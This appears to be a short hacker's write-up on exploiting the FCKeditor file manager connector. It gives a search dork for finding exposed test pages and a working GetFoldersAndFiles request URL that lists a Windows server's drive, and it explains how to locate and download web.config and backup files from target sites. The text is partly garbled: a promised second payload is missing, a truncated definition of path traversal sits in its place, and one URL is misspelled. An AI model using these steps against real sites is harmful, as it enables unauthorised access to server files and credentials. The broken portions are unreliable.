FCKeditor is a lightweight text editor to be used in web pages and upload file too.
1-using this dork inurl /editor/filemanager/connectors/test.html
2-you must know which programming languages was the site programmed?
then choose programming languages from Connector:
and web server too
for example website in poc that i will attach it using ASP.Net
then click on Get Folders and Files
3-you can put partition name if website host in windows server
https://target.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=C:/ >>>>>>(windows server)
c:/inetpub/wwwroot/target/web.config = https://target.com/web.config
if you use this payload
folders and file you will see is website folders and files
so if you find c:/inetpub/wwwroot/target/admin/xxx/1.bak
go to htpps://target.com/admin/xxx/1.bak to download it
note web.config file may be not download :)
in other web server
you can use this payload
A directory or path traversal consists in exploiting insufficient security validation / sanitization of user-supplied…
xxxx is programming languages which the site programmed
File path traversal vulnerability allows an attacker to retrieve files from the local server.
not forget to share this write up with your friends and follow me